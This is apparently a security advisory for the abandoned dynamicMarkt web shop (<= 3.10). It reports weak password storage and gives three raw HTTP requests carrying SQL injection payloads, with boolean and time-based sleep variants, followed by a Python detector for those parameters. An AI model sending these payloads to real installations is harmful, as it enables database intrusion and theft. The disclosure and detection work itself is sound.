I was unable to contact the vendor. The homepage has returned 500 Internal Server Error for at least 10 months now.
You should know that the admin backend password is stored in plaintext inside the database! The user passwords are hashed using MD5. dynamicMarkt sets a weak, 7-character password by default.
These vulnerabilities affect dynamicMarkt <= 3.10.

GET /index.php?page=category&topic=offers&do=show&kat=1169231751%20or%202819%3d02819 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: dm_lang=deu

POST /index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
Cookie: dm_lang=deu

art=kaeufer&kat1=(select*from(select(sleep(20)))a)&Submit=Weiter&page=signup

GET /index.php?page=category&action=&topic=offers&uid=36&oid=&do=shop&art=2&parent=020911029%20or%202590%3d02590&line=neu HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: dm_lang=deu
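
For detection, the three requests above share one trait: `kat`, `kat1` and `parent` carry something other than digits. The following is an added example, not part of the original advisory or of dynamicMarkt; it assumes these parameters are meant to be plain numeric IDs, and the function names and sample list are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Parameters used in the advisory's three requests. Assumption: the
# application expects each of them to be empty or a plain numeric id.
NUMERIC_PARAMS = {"kat", "kat1", "parent"}
DIGITS_ONLY = re.compile(r"[0-9]*")

# Constructed sample of (request target, form body) pairs. The flagged
# entries reuse the parameter values shown in the advisory's requests.
SAMPLE = [
    ("/index.php?page=category&topic=offers&do=show&kat=1169231751", ""),
    ("/index.php?page=category&topic=offers&do=show"
     "&kat=1169231751%20or%202819%3d02819", ""),
    ("/index.php",
     "art=kaeufer&kat1=(select*from(select(sleep(20)))a)"
     "&Submit=Weiter&page=signup"),
    ("/index.php?page=category&uid=36&do=shop&art=2&parent=020911029", ""),
    ("/index.php?page=category&action=&topic=offers&uid=36&oid=&do=shop"
     "&art=2&parent=020911029%20or%202590%3d02590&line=neu", ""),
]


def suspicious_params(target, body=""):
    """Return sorted (name, value) pairs whose value is not purely numeric.

    target: request target as logged, e.g. '/index.php?page=category&kat=1'
    body:   urlencoded form body of a POST request (empty for GET)
    """
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    pairs += parse_qsl(body, keep_blank_values=True)
    return sorted(
        (name, value)
        for name, value in pairs
        if name in NUMERIC_PARAMS and not DIGITS_ONLY.fullmatch(value)
    )


def scan(requests):
    """Return (target, hits) for every request with at least one hit."""
    return [(t, hits) for t, b in requests if (hits := suspicious_params(t, b))]


if __name__ == "__main__":
    for target, hits in scan(SAMPLE):
        print(target, hits)
```

The same digits-only rule, enforced server-side before the value reaches a query (or replaced by a parameterised query), is what closes the injection points rather than just reporting them.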